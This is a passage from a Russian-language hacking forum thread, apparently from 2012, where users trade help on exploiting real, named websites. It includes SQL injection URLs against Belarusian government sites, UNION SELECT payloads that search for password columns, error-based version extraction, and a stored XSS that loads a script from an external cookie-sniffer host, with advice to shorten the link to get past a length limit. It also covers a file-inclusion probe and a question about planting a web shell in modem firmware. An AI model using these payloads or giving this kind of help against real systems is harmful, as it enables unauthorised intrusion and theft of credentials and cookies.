Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    никак. из-за отсутсвия тэгов просто выпадает кусок js скрипта.
    хотя там есть пассиваная хсс:
    можешь попытаться выташить куки.
     
    #19081 d1v, 22 Jan 2012
    Last edited: 22 Jan 2012
  2. Qzen

    Qzen New Member

    Joined:
    22 Nov 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Просканировал сайт Vulnerability сканером нашел уязвимость (ошибка Mysql при ?id=1'), havij позволяет просмотреть все таблицы. А вот в браузере эта ошибка не отображается. Не подскажите почему так?

    зы. Извините за нубовский вопрос.
     
  3. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    В исходный код загляни, может там что найдешь. Ты уверен, что ошибка точно выводится?
     
  4. Qzen

    Qzen New Member

    Joined:
    22 Nov 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    В исходном коде сведений об ошибке нет. При вводе news.php?id=1' открывается просто страничка news.php
    И havij, и vulnerability говорят что ошибка и с легкостью пользуются этой уязвимостью
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    пост запросы смотрел?
     
  6. Qzen

    Qzen New Member

    Joined:
    22 Nov 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Скорее всего там ошибка. Только в виду моей нубизны я не знаю как смотреть)
    Не подскажите, может есть какое то дополнение на Firefox для просмотра?
     
  7. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    Врятли он отправлял POST запросы, там надо вручную указывать все параметры, а он не додумался бы )
    Попробуй выключить редирект
     
    1 person likes this.
  8. Qzen

    Qzen New Member

    Joined:
    22 Nov 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Вот! Поставил оперу, отключил редирект и сработало. В ФФ почему то все равно перенаправлялось.
    Спасибо.
     
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Ошибки не возникало потому что, в новых версиях FireFox кодирует ' как %27. Нужно патчить. Патч можно скачать тут: https://rdot.org/forum/showthread.php?t=1403
     
  10. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Это MySQL?

    _http://www.minprom.gov.by/organizacii?OKPO=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
     
  11. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Версию вывел, а как сейчас таблицы вывести, подскажите?

    _http://www.oim.by/en/department'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'

    Duplicate column name '5.5.8'
     
  12. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Нашел активку на одном сайте...нет фильтра имени и фамилии. но стоит ограничение по символам. я разбиваю код на две части...пихаю...получается такая штука
    <script src=http://адрес-снифера .ru/js.js></script>
    перед .ru стоит пробел и естественно снифер не срабатывает. как можно изловчиться и исправить?
     
  13. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    justonline, используй сервис сокращения ссылок
     
    3 people like this.
  14. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    +union+select+1,2,column_name,4,5,6+from+information_schema.columns+where+column_name+Like'%pass%'+limit+0,20+--+
    подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
    например вывел "password" а название таблицы у этой колонки как узнать
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    union select 1,2,concat(table_name,0x3a,column_name),4,5,6
     
    _________________________
  16. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    спосибо, а то название таблиц не стандартное - "a_affiliates"
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index
    немного не понял ошибку, объясните
     
    _________________________
  18. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    index.php:
    PHP:
    include 'include/include.php';
    include 
    'some/' $_GET[child] . '.php';
    include/include.php:
    PHP:
    [...]
    function 
    strips(){/*whatever*/}
    [...]
    index.php?
    функция и так обозначается, и инклудя свой же файл ты вызываешь обозначение той же самой функции, но т.к. она уже обозначена ты получаешь ошибку.
     
    1 person likes this.
  19. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    Сразу выводи название таблиц и колонок, чтобы их потом отдельно не смотреть.
    UPD: Konqi уже ответил :) не заметил
     
    #19099 gl0w, 26 Jan 2012
    Last edited: 26 Jan 2012
  20. Ro Man

    Ro Man Elder - Старейшина

    Joined:
    4 Jun 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    0
    возможно ли в прошивку модема адсл вшить веб шелл?
     
Thread Status:
Not open for further replies.